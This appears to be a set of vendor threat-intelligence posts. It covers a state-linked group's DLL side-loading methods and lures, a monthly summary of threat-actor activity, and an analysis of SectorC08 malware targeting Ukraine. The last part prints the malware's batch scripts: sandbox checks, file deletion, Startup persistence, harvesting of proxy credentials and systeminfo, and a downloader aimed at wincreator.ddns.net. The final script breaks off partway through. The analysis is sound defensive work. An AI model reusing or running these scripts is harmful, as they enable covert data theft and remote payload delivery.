Side Load 7 – Adobe Acrobat 3D Utility (A3DUtility.exe)

The SectorF01 group used the normal “A3DUtility.exe” (Adobe Acrobat 3D Utility software) to utilize the “DLL Side-Loading” technique. The normal “A3DUtility.exe” file loads DLLs such as a “BIB.dll” DLL file.

The SectorF01 group sets the name of their malicious DLLs to “ACE.dll”, “AGM.dll”, “CoolType.dll”, “MSVCP80.dll”, “MSVCR80.dll” in addition to “BIB.dll”. They distribute these files together with the renamed normal “A3DUtility.exe” in the same path. These different DLL files are all loaded by the normal “A3DUtility.exe”.

The following shows the code in “A3DUtility.exe” loading the “AGM.dll”, “BIB.dll”, “CoolType.dll”, and so on.

“BIB.dll” is loaded and the Export API function is called. The malicious code of the SectorF01 group is inserted into the “BIB_12” function, and all other function addresses point to the “BIB_12” function address. This allows their malware to work no matter what Export API in “BIB.dll” is called. The other malicious DLLs are configured in the same way.

The exported functions of “BIB.dll”

The “BIB_12” function in “BIB.dll” contains the malicious code.

When the normal “A3DUtility.exe” is executed, the malicious DLL files are loaded and malware is executed.

Side Load 8 – WeChat (WeChat.exe)

The SectorF01 group used the normal “WeChat.exe” (WeChat software) to utilize the “DLL Side-Loading” technique. The normal “WeChat.exe” file loads a “WeChatWin.dll” DLL file.

WeChat is a famous Chinese messenger program.

They set the file name of their malicious DLL to be “WeChatWin.dll” and deploy it in the same path along with the renamed normal “WeChat.exe” file. When the victim executes this renamed “WeChat.exe”, the malicious “WeChatWin.dll” file is loaded and malware is executed.

Side Load 9 – Coc Coc Browser Update (CocCocUpdate.exe)

The SectorF01 group used the normal “CocCocUpdate.exe” (Coc Coc Browser Update Software) to utilize the “DLL Side-Loading” technique. The normal “CocCocUpdate.exe” file loads a “coccocpdate.dll” DLL file.

“Coc Coc Browser” is a famous web browser in Vietnam.

The following shows the code in “CocCocUpdate.exe” that loads the “coccocpdate.dll” “DllEntry” function.

They set the file name of their malicious DLL to be “coccocpdate.dll” and deploy it in the same path along with the renamed normal “CocCocUpdate.exe” file. When the victim executes this renamed “CocCocUpdate.exe”, the malicious “coccocpdate.dll” file is loaded and malware is executed.

The “DllEntry” function in “coccocpdate.dll” contains the malicious code.

Side Load 10 – 360安全浏览器 (360 Secure Browser) (360se.exe)

The SectorF01 group used the normal “360se.exe” (360安全浏览器 – 360 Secure Browser) to utilize the “DLL Side-Loading” technique. The normal “360se.exe” file loads a “chrome_elf.dll” DLL file.

“360安全浏览器(360 Secure Browser)” is a famous web browser in China.

The following shows the code in “360se.exe” that loads the “chrome_elf.dll” “SignalInitializeCrashReporting” Export API function.

They set the file name of their malicious DLL to be “chrome_elf.dll” and deploy it in the same path along with the renamed normal “360se.exe” file. When the victim executes this renamed “360se.exe”, the malicious “chrome_elf.dll” file is loaded and malware is executed.

“chrome_elf.dll” is loaded and the Export API function “SignalInitializeCrashReporting” is called.

The “SignalInitializeCrashReporting” function in “chrome_elf.dll” contains the malicious code.

Side Load 11 – 360软件管家 (360 Software Manager) (SoftManager.exe)

The SectorF01 group used the normal “SoftManager.exe” (360软件管家 – 360 Software Manager) to utilize the “DLL Side-Loading” technique. The normal “SoftManager.exe” file loads a “dbghelp.dll” DLL file.

“360软件管家(360 Software Manager)” is a famous software management program in China.

They set the file name of their malicious DLL to be “dbghelp.dll” and deploy it in the same path along with the renamed normal “SoftManager.exe” file. When the victim executes this renamed “SoftManager.exe”, the malicious “dbghelp.dll” file is loaded and malware is executed.

Side Load 12 – Neuber Software Typograf font manager (FontSets.exe)

The SectorF01 group used the normal “FontSets.exe” (Neuber Software Typograf font manager) to utilize the “DLL Side-Loading” technique. The normal “FontSets.exe” file loads a “FaultRep.dll” DLL file.

“Neuber Software Typograf font manager” is a famous font management program.

“FontSets.exe” loads the “FaultRep.dll” file from the same path as the executed program according to the Windows DLL search order, before the copy in the Windows system folder is considered.

The following shows the code in “FontSets.exe” that loads the “FaultRep.dll” DLL.

They set the file name of their malicious DLL to be “FaultRep.dll” and deploy it in the same path along with the renamed normal “FontSets.exe” file. When the victim executes this renamed “FontSets.exe”, the malicious “FaultRep.dll” file is loaded and malware is executed.

Side Load 13 – McAfee VirusScan On-Demand Scan (mcods.exe)

The SectorF01 group used the normal “mcods.exe” (McAfee VirusScan On-Demand Scan) to utilize the “DLL Side-Loading” technique. The normal “mcods.exe” file loads a “McVsoCfg.dll” DLL file.

The SectorF01 group utilized normal files of Anti-Virus programs and exploited the fact that these files are usually whitelisted by other security products and that their behavior might be exempted from monitoring.

The normal “mcods.exe” file loads a “McVsoCfg.dll” DLL file.

“McVsoCfg.dll” is loaded and the Export API function “McVsoCfgGetObject” is called. The “McVsoCfgGetObject” function in “McVsoCfg.dll” contains the malicious code.

They set the file name of their malicious DLL to be “McVsoCfg.dll” and deploy it in the same path along with the renamed normal “mcods.exe” file. When the victim executes this renamed “mcods.exe”, the malicious “McVsoCfg.dll” file is loaded and malware is executed.

Side Load 14 – McAfee Oem Module (mcoemcpy.exe)

The SectorF01 group used the normal “mcoemcpy.exe” (McAfee Oem Module) to utilize the “DLL Side-Loading” technique. The normal “mcoemcpy.exe” file loads a “McUtil.dll” DLL file.

They set the file name of their malicious DLL to be “McUtil.dll” and deploy it in the same path along with the renamed normal “mcoemcpy.exe” file. When the victim executes this renamed “mcoemcpy.exe”, the malicious “McUtil.dll” file is loaded and malware is executed.

Side Load 15 – Symantec Network Access Control (rastlsc.exe)

The SectorF01 group used the normal “rastlsc.exe” (Symantec Network Access Control) to utilize the “DLL Side-Loading” technique. The normal “rastlsc.exe” file loads a “RasTls.dll” DLL file.

They set the file name of their malicious DLL to be “RasTls.dll” and deploy it in the same path along with the renamed normal “rastlsc.exe” file. When the victim executes this renamed “rastlsc.exe”, the malicious “RasTls.dll” file is loaded and malware is executed.

Side Load 16 – Kaspersky Anti-Virus Installation assistant host (avpia.exe)

The SectorF01 group used the normal “avpia.exe” (Kaspersky Anti-Virus Installation Assistant host) to utilize the “DLL Side-Loading” technique. The normal “avpia.exe” file loads a “product_info.dll” DLL file.

They set the file name of their malicious DLL to be “product_info.dll” and deploy it in the same path along with the renamed normal “avpia.exe” file. When the victim executes this renamed “avpia.exe”, the malicious “product_info.dll” file is loaded and malware is executed.

Side Load 17 – Kaspersky Light Plugin Extension Registrar (plugins-setup.exe)

The SectorF01 group used the normal “plugins-setup.exe” (Kaspersky Light Plugin Extension Registrar) to utilize the “DLL Side-Loading” technique. The normal “plugins-setup.exe” file loads a “product_info.dll” DLL file.

They set the file name of their malicious DLL to be “product_info.dll” and deploy it in the same path along with the renamed normal “plugins-setup.exe” file. When the victim executes this renamed “plugins-setup.exe”, the malicious “product_info.dll” file is loaded and malware is executed.

Side Load 18 – Avast Antivirus remediation (wsc_proxy.exe)

The SectorF01 group used the normal “wsc_proxy.exe” (Avast Antivirus remediation) to utilize the “DLL Side-Loading” technique. The normal “wsc_proxy.exe” file loads a “wsc.dll” DLL file.

They set the file name of their malicious DLL to be “wsc.dll” and deploy it in the same path along with the renamed normal “wsc_proxy.exe” file. When the victim executes this renamed “wsc_proxy.exe”, the malicious “wsc.dll” file is loaded and malware is executed.

The lures related to South Korea

The SectorF01 group has used more than 800 malware samples over about seven years, with keywords related to various countries. Here we summarize the attacks whose malware contains keywords related to South Korea. They mainly attacked countries in Southeast Asia; however, a Japanese automobile company (Japan being an East Asian country) is likely to have been attacked by the SectorF01 group recently as well, and similar malware found at around the same time is suspected to be related to a South Korean automobile company.

We cannot be sure that this attack was carried out on South Korea just because it contained keywords related to South Korea. However, the SectorF01 group is using subjects related to South Korea in their attack, and it is possible that the attack was directly or indirectly related to South Korea. The SectorF01 group has carried out a number of attacks against foreign companies that have entered Vietnam, and so there is a possibility that South Korean companies may be targeted.

Lure 1 – Hyundai Thành Công

There is one malware that the SectorF01 group used in January 2019 to attack specific targets using the “DLL Side-Loading” technique. The file name of the malware used in this attack is “Ho so dang ky lam dai ly uy quyen chinh thuc cua Huyndai – Thanh Cong – Nguyen Thi Mai Phuong.exe”. “Huyndai” in the file name is likely to be a typo of “Hyundai”. “Hyundai – Thanh Cong (Hyundai Thành Công)” is a joint venture established by a South Korean automobile company in cooperation with a large Vietnamese company.

Malware distributed using the subject of “Huyndai [sic] – Thanh Cong”
“HYUNDAI THANH CONG” Website

Both “wwlib.dll” and the following normal document are executed, causing the user to believe that the document is executed as per normal, without loading any executable file.

Normal document executed by “wwlib.dll”

Lure 2 – Cambodia National Rescue Party in Republic of Korea

There is a malicious document called “FW Report on demonstration of former CNRP in Republic of Korea.doc” that the SectorF01 group used in July 2018 to attack using the “CVE-2017-11882” vulnerability. “CNRP” in the file name is likely to be an abbreviation of “Cambodia National Rescue Party”, and there are many supporters of the Cambodia National Rescue Party (CNRP) in South Korea. Indeed, in April 2019, thousands of CNRP supporters gathered in Gwangju, South Korea, to protest the liberation of democracy in Cambodia.

“CNRP” supporters’ demonstrations in Gwangju, Korea, The Phnom Penh Post

When executing the document, the malware is executed by the vulnerability “CVE-2017-11882”. The following screen is displayed when the document is viewed.

“FW Report on demonstration of former CNRP in Republic of Korea.doc” document

Lure 3 – KoreanTimesSSK Font

The SectorF01 group attacked using fonts as lure subjects, pretending to be a font management program or font file. They seem to utilize font-related programs in attacks because most of the countries that the group attacks have a non-English native language and have to use various fonts accordingly. The SectorF01 group used a file disguised as a Korean font in June 2017, and the “KoreanTimesSSK” font used in the attack was a Korean font created by Southern Software.

Conclusion

We have traced the SectorF01 group, which has been steadily conducting cyber espionage activities in Southeast Asia for the past seven years, and examined their initial penetration methods. They conduct hacking activities against neighboring countries and opposition forces in order to maintain their own regime and economic profit. This is likely state-level hacking for the benefit of the state, and recently the group has also been hacking other industries, such as the automobile industries of more advanced countries, to contribute to the industrial development of their own country. These attacks are spreading to the East Asian region, which is a huge threat to the neighboring countries as well as to the national institutions.

The scope of activities and number of malware that the group uses every year for attacks is increasing, and we need to understand them more and prepare for their attacks. We should be prepared to effectively detect and respond to their attacks through steady threat hunting and intelligence activities.

Indicators of Compromise

The IOCs containing the malware hashes (827 total) that the SectorF01 group used from 2013 until the end of June 2019 for cyber espionage can be found here.

More information about the SectorF01 group is available to customers of ThreatRecon Intelligence Service (RA.global@nshc.net).

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

Drive-by Compromise
Exploit Public-Facing Application
Spearphishing Attachment
Spearphishing Link
Valid Accounts

Execution

Command-Line Interface
Compiled HTML File
Control Panel Items
Execution through API
Execution through Module Load
Exploitation for Client Execution
Mshta
PowerShell
Regsvr32
Rundll32
Scheduled Task
Scripting
Service Execution
Signed Script Proxy Execution
Trusted Developer Utilities
User Execution
Windows Management Instrumentation

Persistence

Component Object Model Hijacking
DLL Search Order Hijacking
Hidden Files and Directories
Modify Existing Service
New Service
Office Application Startup
Registry Run Keys / Startup Folder
Scheduled Task
Valid Accounts
Web Shell

Privilege Escalation

Bypass User Account Control
DLL Search Order Hijacking
Exploitation for Privilege Escalation
New Service
Process Injection
Scheduled Task
Valid Accounts
Web Shell

Defense Evasion

Binary Padding
Bypass User Account Control
Compiled HTML File
Component Object Model Hijacking
Control Panel Items
Deobfuscate/Decode Files or Information
DLL Search Order Hijacking
DLL Side-Loading
File Deletion
File Permissions Modification
Hidden Files and Directories
Indicator Removal on Host
Masquerading
Modify Registry
Mshta
NTFS File Attributes
Obfuscated Files or Information
Process Injection
Regsvr32
Rundll32
Scripting
Signed Script Proxy Execution
Software Packing
Template Injection
Timestomp
Trusted Developer Utilities
Valid Accounts
Virtualization/Sandbox Evasion
Web Service

Credential Access

Credential Dumping
Input Capture
Network Sniffing

Discovery

Account Discovery
File and Directory Discovery
Network Service Scanning
Network Sniffing
Process Discovery
Query Registry
Remote System Discovery
System Information Discovery
System Network Configuration Discovery
System Network Connections Discovery
System Owner/User Discovery
Virtualization/Sandbox Evasion

Lateral Movement

Application Deployment Software
Distributed Component Object Model
Exploitation of Remote Services
Pass the Hash
Pass the Ticket
Remote File Copy
Windows Admin Shares

Collection

Automated Collection
Data from Local System
Input Capture
Man in the Browser
Screen Capture

Command and Control

Commonly Used Port
Custom Command and Control Protocol
Data Encoding
Data Obfuscation
Domain Generation Algorithms
Multi-Stage Channels
Multiband Communication
Remote File Copy
Standard Application Layer Protocol
Uncommonly Used Port
Web Service

Exfiltration

Data Compressed
Data Encrypted
Exfiltration Over Alternative Protocol
Exfiltration Over Command and Control Channel

Impact

Transmitted Data Manipulation

Monthly Threat Actor Group Intelligence Report, May 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from April 21 to May 20, 2019.

1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA02, SectorA05 and SectorA07, were found among SectorA hacking groups this May. Analysis of the hacking campaigns of SectorA groups over a long period of time reveals that SectorA02, SectorA05 and the newly defined SectorA07 are the most active. The increase in activity of these three groups means that the strategy, hacking purpose and direction of the entire SectorA groups are clarified. In addition, it means that the goals of each group in SectorA are now clear.

In the past, the SectorA02 and SectorA05 groups conducted hacking campaigns to collect advanced information related to Korea. However, these groups are currently conducting hacking campaigns to gather information on political activities in Europe, North America, and Southeast Asia, where countries that can influence the political and diplomatic activities of the SectorA government are located.

In May, the newly defined SectorA07 group was a small subgroup of the larger existing SectorA05 group. As a result of analyzing their hacking campaigns, we found that the SectorA07 group is active only for the purpose of collecting financial information from companies located in countries such as South Korea and Southeast Asia.

The SectorA02 group uses the most diverse hacking strategies and techniques in SectorA. They develop and utilize a variety of hacking strategies and techniques such as simple phishing attacks, spear phishing attacks with malware, and sophisticated social engineering techniques using KakaoTalk (a popular messenger in South Korea). On the other hand, SectorA05 and SectorA07 focused on utilizing spear phishing, which was used frequently in the past, for initial access. They use Microsoft Word or HWP file format malware selectively depending on their target victim.

We observe that SectorA is targeting specific countries less and now gathering political and economic activity information of various countries related to the SectorA government and capturing financial information in a variety of non-specific countries and regions.

2. SectorB Activity Features

SectorB groups are conducting campaigns in various countries around the world. In May, a total of four hacking groups were found to be active in SectorB.

In the Middle East and Southeast Asia, the activity of SectorB01 which had a low activity frequency over the past period has started to increase. The SectorB01 group used Microsoft Word files containing code execution vulnerabilities to execute malware. These files were attached to their spear phishing emails, and this technique was frequently used by other SectorB groups in the past. In May, the SectorB01 group was also found using malware that runs on the Linux operating system and it seems they are preparing their capabilities for attacks on various operating systems.

The SectorB03 group, mainly acting in North America, used the remote code execution vulnerability CVE-2019-0604 to attack Microsoft SharePoint servers, which was not used by other hacking groups in the past. They attempted to exploit the vulnerability in order to penetrate the internal network by uploading a WebShell to the target server.

SectorB09 group mainly operates in East Asia, and they use malware with characteristics similar to those used in the past. However, they are using a new hacking technique as they are masquerading their malware as a setup file of a commercial cloud service and then distributing malware to specific targets.

The SectorB16 group, acting mainly in Europe and Southeast Asia, uses only open source tools and known existing vulnerabilities. This characteristic makes it more difficult to detect their hacking activity.

SectorB groups are likely to conduct hacking activities to seize relevant diplomatic information as part of a recent trade war with the United States. As a result, the frequency of SectorB group hacking campaigns is expected to increase.

3. SectorC Activity Features

In May, a total of three hacking groups were found among the SectorC groups. They perform hacking activities mainly in Europe, South America, and Eastern Europe where political friction is frequent.

The SectorC01 group mainly utilized malware recently produced in the Go language this month. This seems to be a strategic choice because the Go programming language is portable across heterogeneous platforms and widely usable.

The SectorC02 group installs information-collecting malware which targets Microsoft Exchange Servers. This is similar to malware used in hacking campaigns in countries located in Europe in the past, and seems to be aimed at stealing e-mail information that can be used for various purposes.

The SectorC08 group conducts intensive hacking activities targeting countries in Eastern Europe where political friction continues. The malicious code found in May was in the form of an executable compressed file, 7ZipSFX, which has the characteristics of using both script files and known normal files together. This is similar to the activities of the SectorC08 group found in the past.

4. SectorD Activity Features

In May, a total of two hacking groups were found among SectorD groups. They perform hacking activities mainly on other Middle Eastern countries which they have political tensions with.

The SectorD01 group mainly conducted hacking activities for the purpose of collecting information using spear phishing emails with Microsoft Excel files that contain malicious macros, and malware using AutoHotKey and TeamViewer, both of which they have not used in the past.

The SectorD02 group also conducted hacking campaigns in the Middle East. They used spear phishing with malware for initial access, just like most other Sector groups. Recently, they used open-source penetration testing tools in their attacks, which seems to be an attempt to not leave traces of attack activity.

5. SectorE Activity Features

In May, a total of three hacking groups were found among SectorE groups. They perform hacking activities mainly against their rival countries in Central Asia, including Pakistan.

The SectorE02 group typically used spear phishing emails with an attached Microsoft Excel document with malicious macro scripts for initial access.

The SectorE05 group also used Microsoft Word malware for hacking activities, with the internals of these Word files including two files with OLE structures and two files with executable file structures.

Hacking campaigns of SectorE hacking groups have been concentrated against their competitor countries after a military physical conflict with a political rival country. Due to this political situation, the hacking campaigns of SectorE groups are expected to continue.

6. SectorF Activity Features

In May, the SectorF01 group mainly operated against China, Thailand, Cambodia and India. In addition, hacking campaigns targeting Japan automotive companies located in Southeast Asia were also found.

The SectorF01 group constantly uses a variety of attack methods: executable files disguised with document file icons, MS Word documents containing VBA macro scripts, RTF files exploiting the CVE-2017-11882 vulnerability, and the WinRAR ACE vulnerability (CVE-2018-20250). Recent hacking activities of the SectorF01 group seem to serve different purposes from the past, as they now also hack various countries and organizations for the economic development of their own country as opposed to only for political and military information.

This type of hacking activity is similar to previous attempts of another sector, SectorB, to collect technology information of Western countries in order to advance their own technology and economic development. It appears that the SectorF01 group will continue to target various advanced countries and high technology industries for these purposes.

7. Cyber Crime Groups Activity Features

Hacking groups included as part of SectorJ are those that perform high profile cyber crime activities to seize financial information that can generate an economic profit. In May, a total of two hacking groups were found among these Cyber Crime Groups and their hacking activities were found over a wide range of areas.

The hacking activities of the SectorJ04 group were mainly found in Italy, Korea, Romania, South Africa and India, and are targeted at major companies in the financial industry such as banks. The group mainly uses malware in the form of an MS Excel file containing macro scripts, and they are using different malware and strategies across Europe and Asia.

The SectorJ09 group hacking activities observed were for hijacking credit card payment information for e-commerce platforms used in online stores in North America and universities in the US and Canada.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

SectorC08: Multi-Layered SFX in Recent Campaigns Target Ukraine

Overview

Unlike other state sponsored threat actors, SectorC08 appears to be only concerned with a single target: Ukraine. Artifacts of their likely activity have been found as far back as 2013 and up till today their modus operandi in their initial stages of operation has not changed much.

We analyzed over 50 of their executable malware files found very recently in order to look at similarities, differences, and outliers. We found that while a few samples still used SectorC08’s executable file structure which contained batch scripts which were split out into many files (e.g. Wariables.cmd) or batch scripts together with a decoder executable and an encoded executable, most of them followed the structure we will be detailing below.

Example of a Typical First Stage Structure (a8f849d536481d7d8a0fa59a7bcc03dd3387ab4cc14c0342371ae295817f505c)

All samples which we can confirm came in the months of May and June used the same structure in their malware which we will be describing below: a 7zSFX archive which opens a password protected WinRARSFX archive, which then attempts to use a version of wget to download its third stage malware which is another WinRARSFX archive such as UltraVNC.

Fake Documents

Some of the malware samples contained an embedded fake document pertaining to Ukrainian issues. We observed six such embedded fake documents, which were sometimes reused against different targets. The documents are opened by the batch file embedded in the 7zSFX archive.

Example of files embedded in a 7zSFX archive. “6710” is the embedded fake document here.

The batch file is always the file SectorC08 sets to run once the 7zSFX archive is executed, and to distract the victim while it performs its malicious activity, the batch file opens the fake document.

<18974.cmd> – Commands Related to Opening Fake Document
…
set CHeqCJB=Document
…
set EhFWXVK=6710
…
copy /y "%EhFWXVK%" "%CHeqCJB%.docx"
…
"%CD%\%CHeqCJB%.docx"
…

The fake documents are always in Ukrainian and pertain to Ukrainian issues such as legal, political, military or police issues.

By comparing the date in the document content to the malware's internal version code (described later), and from our knowledge of previous version codes and dates, we can conclude that where the version code corresponds to a date it is at least a roughly accurate timestamp, which lets us build a partial timeline of events.

For example, the fake military document dated 21st May 2019 was found in three separate malware samples, where the version code “21.05” (21st May) appeared twice and “22.05” (22nd May) appeared once. Another example is the undated fake police message where the version code “24.05” (24th May) appeared thrice and “prok” and “27” appeared once each.

Basic Anti-Analysis

At the start of this batch script, the malware looks for Wireshark and Process Explorer with the TaskList command. If either is found, the script jumps to a label "exit" that is never defined; cmd.exe then aborts the batch file with a "cannot find the batch label" error, so execution does stop. The check itself is flawed, however: %ErrorLevel% is expanded only after the For loop has finished, so the condition reflects only the last process tested (procexp.exe), and a machine where only Wireshark is running passes the check. The logic therefore does not do everything the attacker thinks it does.

<18974.cmd> – Basic Anti-Analysis
…
For %%g In (wireshark procexp) do (
    TaskList /FI "ImageName EQ %%g.exe" | Find /I "%%g.exe"
)
If %ErrorLevel% NEQ 1 goto exit
…

While looking for Wireshark and Process Explorer was consistent across their malware samples, we also found single instances where the malware checked for HttpAnalyzer (9dbc77844fc3ff3565970cb09d629a710fdec3065b6e4c37b20a889c716c53bf) and, in an older sample from a different SectorC08 malware family (034fed63fc366ff3cf0137caced77a046178926c63faf1a8cd8db9d185d40821), whether the machine's username was a known sandbox username such as "TEQUILABOOMBOOM" or "MALWARETEST".

<statecrypt.cmd> – Checking for usernames such as “TEQUILABOOMBOOM”
…
Set ProcessName=wireshark.exe
TaskList /FI "ImageName EQ %ProcessName%" | Find /I "%ProcessName%"
If %ErrorLevel% NEQ 1 goto hotlog
set name=%username%
if "%name%"=="MALTEST" goto hotlog
if "%name%"=="MALWARETEST" goto hotlog
if "%name%"=="TEQUILABOOMBOOM" goto hotlog
if "%name%"=="SANDBOX" goto hotlog
if "%name%"=="VIRUS" goto hotlog
if "%name%"=="MALWARE" goto hotlog
if "%name%"=="MALWARES" goto hotlog
if "%name%"=="TEST" goto hotlog
if "%name%"=="TROYAN" goto hotlog
…
:hotlog
ping 127.0.0.1
taskkill /f /im mshta.exe
for /r "%TEMP%" %%d in (.) do dir /b "%%~d" | find /v "">nul || rd /s /q "%%~d"
del /f /q "%CD%\*.vbs"
del /f /q "%CD%\*.exe"
del /f /q "%CD%\*.cmd"
exit

First Stage Persistence

In this sample, the first stage 7zSFX archive contains the first stage batch script (filename: “18974.cmd”), a shortcut link to run “%USERPROFILE%\winver.exe -pgblfhsuyjqyst” (filename: “11666”), the fake document (6710), and the second stage WinRARSFX archive (filename: “5610”). In the first stage batch script, we can see that the second stage executable is getting renamed and moved to “%USERPROFILE%\winver.exe”, then the shortcut file is being moved to “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\winver.lnk” for persistence.

<18974.cmd> – Commands Related to Persistence
…
set KsEEKky="%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
…
set "EbnMNIJ=%USERPROFILE%"
…
set UDWwujG=winver
…
set GLUymyw=5610
…
copy /y "%GLUymyw%" "%EbnMNIJ%\%UDWwujG%.exe"
…
copy /y "11666" %KsEEKky%\%UDWwujG%.lnk
…

Sample Second Stage (EE623D8FCF366249A381B0CB50CE6295E913F88CB0F9CB4D8116C0F3D9FA16F2)

In many recent cases, the second stage is a password-protected WinRARSFX containing a VBS file whose only purpose is to run batch commands via WScript, a .cmd batch file containing the commands to run, and a renamed copy of wget.

The second stage WinRARSFX archive

In this example, the password used to open the second stage is "uyjqystgblfhs". While SectorC08 sometimes changes the WinRARSFX password (or simply uses another, unprotected 7zSFX archive), we observed this particular password at least 11 times across their malware samples. This suggests that while they have likely automated parts of the process of building these batch scripts, much of it is still manual.

<18974.cmd> – Commands Related to Second Stage Password
…
set "EbnMNIJ=%USERPROFILE%"
…
set UDWwujG=winver
…
set GLUymyw=5610
…
set cjhIZDS=uyjqystgblfhs
…
taskkill /f /im %UDWwujG%.exe
…
copy /y "%GLUymyw%" "%EbnMNIJ%\%UDWwujG%.exe"
…
start "" %EbnMNIJ%\%UDWwujG%.exe -p%cjhIZDS%
…

Second Stage Persistence and Wget

Whatever the first-stage layout, the chain always ends in a downloader stage that launches one of several versions of wget to fetch the third stage.

<11009.cmd> – Full Contents
@echo off
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
chcp 1251>NUL
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn
setlocal enabledelayedexpansion
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
set "qwoMlMx=HKCU\Software"
set SbTrL=%SgJyn%*whAWq-%atpVW%
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
set "CnGKehh=Microsoft\Windows"
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
set SbTrL=%SgJyn%*whAWq-%atpVW%
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
set "XCEEJVi=CurrentVersion\Internet Settings"
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
set GMXXMeP="%qwoMlMx%\%CnGKehh%\%XCEEJVi%"
set SbTrL=%SgJyn%*whAWq-%atpVW%
if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn
For /F "UseBackQ Tokens=2*" %%n In (`Reg.exe Query %GMXXMeP%^|Find /I "ProxyServer"`) do set BtRtCGM=%%o
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
For /F "UseBackQ Tokens=2*" %%u In (`Reg.exe Query %GMXXMeP%^|Find /I "ProxyUser"`) do set tBUCICm=%%v
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
For /F "UseBackQ Tokens=2*" %%n In (`Reg.exe Query %GMXXMeP%^|Find /I "ProxyPass"`) do set BwtKgWA=%%o
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
set SbTrL=%SgJyn%*whAWq-%atpVW%
For /F "skip=1 Tokens=4*" %%u In ('vol c:') Do set KsEEKky=%%u
if %KsEEKky%==is ( For /F "skip=1 Tokens=5*" %%v In ('vol c:') Do set KsEEKky=%%v )
if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
set EbnMNIJ=22.05
set SbTrL=%SgJyn%*whAWq-%atpVW%
set per_24=%computername%
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
set DOHVFwJ=0
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
set SbTrL=%SgJyn%*whAWq-%atpVW%
systeminfo > UDWwujG
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
FOR /F "tokens=*" %%n IN (UDWwujG) do @IF NOT i%%n==i set CHeqCJB=!CHeqCJB!%%n+###
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
set SbTrL=%SgJyn%*whAWq-%atpVW%
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
set NFJOtqt=%computername%_%KsEEKky:-=%
set SbTrL=%SgJyn%*whAWq-%atpVW%
set eNSzFCv=http
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
set SbTrL=%SgJyn%*whAWq-%atpVW%
if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn
set FbNZKeg=wincreator
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn
set HIngDXg=ddns.net
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
set EhFWXVK=%eNSzFCv%://%FbNZKeg%.%HIngDXg%
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
set SbTrL=%SgJyn%*whAWq-%atpVW%
set GLUymyw=jasfix
set SbTrL=%SgJyn%*whAWq-%atpVW%
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
set "cjhIZDS=%APPDATA%\Microsoft\IE"
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
set ViKDbBD=MicrosoftCreate
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
set SbTrL=%SgJyn%*whAWq-%atpVW%
set BDwSMJD=weristotal
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
set NOdKmih=winusers
if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn
set flkpgez=bitvers
set per_23="Mozilla/5.0 (Windows NT 10.0) Safari/537.36 OPR/54.0.2952.64"
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
MD "%cjhIZDS%"
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
copy "%ViKDbBD%.exe" "%cjhIZDS%\%BDwSMJD%.exe" /y
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
